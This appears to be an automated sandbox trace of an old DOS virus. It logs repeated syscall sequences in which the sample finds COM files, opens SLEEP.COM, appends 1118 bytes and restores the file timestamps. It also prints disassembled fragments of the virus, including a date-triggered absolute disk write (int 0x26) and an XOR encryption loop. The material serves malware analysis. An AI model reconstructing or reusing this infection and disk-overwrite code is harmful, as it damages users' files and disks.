2018-12-25T12:39:33.905024931Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.907039754Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.909469368Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:33.91116927Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.91409457Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.924205486Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.926570986Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.928122219Z	62	PC: 12d0b | Close file
2018-12-25T12:39:33.937302743Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.949023432Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:33.952049793Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.960464053Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.968344173Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.970242899Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.981516743Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.984024927Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:33.991198542Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.994230307Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.99762196Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.000399337Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.001833861Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.004699437Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.014110597Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.016331992Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.018717158Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.028071661Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.039361745Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.043134795Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.051182004Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.058394278Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.060357074Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.067482433Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.069238502Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.07664413Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.080792182Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.083777619Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.086732205Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.08973811Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.097296311Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.107497765Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.111147815Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.113446448Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.122300014Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.134181799Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.13739787Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:34.141812149Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:34.010036949Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:34.01367191Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:34.017354084Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:34.02029957Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:34.02167709Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:34.029022591Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.033062651Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:34.037327445Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:34.039305173Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:34.051248729Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:34.053002525Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.057590061Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:34.059507136Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.061239184Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.06345525Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:34.064419014Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.065792155Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:34.071670754Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.073728522Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:34.075334226Z	62	PC: 12d0b | Close file
2018-12-25T12:39:34.083276658Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:34.097073282Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:34.099696688Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.107648093Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.113817123Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.115881153Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.126660311Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.128336008Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.134682666Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.138275836Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.140877225Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.14335605Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.14570958Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.147943641Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.15660547Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.159428475Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.161074643Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.168527837Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.178429153Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.181419209Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.187886163Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.194162882Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.196628388Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.206709271Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.208493047Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.216153829Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.219113831Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.221883524Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.225542347Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.227232127Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.229532438Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.239532606Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.241615259Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.242960336Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.251348973Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.260689981Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.262683984Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:34.26695011Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:34.046050223Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:34.049188109Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:34.051949018Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:34.055804273Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:34.057909528Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:34.06370641Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.069848568Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:34.076188078Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:34.079427081Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:34.097722524Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:34.099497396Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.110720356Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:34.117086824Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.119662438Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.123146562Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:34.124896108Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.127353932Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:34.135161826Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.137429138Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:34.138599095Z	62	PC: 12d0b | Close file
2018-12-25T12:39:34.144262715Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:34.156735787Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:34.158539305Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.16355593Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.174769151Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.176602103Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.187325003Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.188840637Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.192945457Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.195176674Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.197381748Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.199327531Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.200358119Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.20236063Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.2079469Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.209683382Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.213708116Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.219423246Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.229070027Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.232329944Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.239653417Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.246552107Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.249686408Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.25942966Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.261228274Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.26859666Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.271379681Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.273857422Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.289626545Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.291318289Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.293470243Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.303090398Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.305330822Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.306851825Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.31574618Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.32606042Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.328157537Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:34.333379728Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:34.691110978Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:34.693785747Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:34.696570561Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:34.700413661Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:34.705912009Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:34.71652027Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.7339583Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:34.740039264Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:34.742944466Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:34.758897728Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:34.760986042Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.768201456Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:34.770950911Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.773499095Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.777002872Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:34.778340787Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.780339634Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:34.78924239Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.791553155Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:34.79388576Z	62	PC: 12d0b | Close file
2018-12-25T12:39:34.802322767Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:34.811980474Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:34.814769286Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.822329971Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.828893648Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.831104606Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.853125092Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.855158769Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.861689518Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.864649533Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.868036924Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.871669377Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.873394205Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.876802847Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.885822899Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.888318949Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.891222981Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.899047389Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.908943886Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.912618658Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.919504187Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.926504953Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.929682457Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.940096596Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.942137112Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:34.949599739Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.951703901Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.953606768Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.955389976Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.957048878Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.958554087Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.963887828Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.975434884Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.977285007Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.985028739Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.995389958Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:34.99752548Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:35.001382385Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:34.873666491Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:34.877059855Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:34.886111206Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:34.890020105Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:34.891933444Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:34.903374703Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.909688791Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:34.916451908Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:34.919272997Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:34.934496209Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:34.936607972Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:34.943973237Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:34.946616099Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.949185795Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:34.952530505Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:34.954281204Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.956718448Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:34.965921659Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.967990731Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:34.969468521Z	62	PC: 12d0b | Close file
2018-12-25T12:39:34.976363583Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:34.982716228Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:34.984579505Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.989271942Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.994474334Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.997143413Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.008066029Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.010014212Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:35.016677428Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:35.019929582Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:35.023423169Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:35.025955333Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:35.02823102Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.030761051Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:35.039309742Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.041739299Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:35.051088711Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:35.062496364Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:35.072216461Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:35.075093879Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:35.081460651Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:35.087701974Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:35.090754264Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.100744636Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.102797955Z	61	PC: 12cab | Open file (See above)
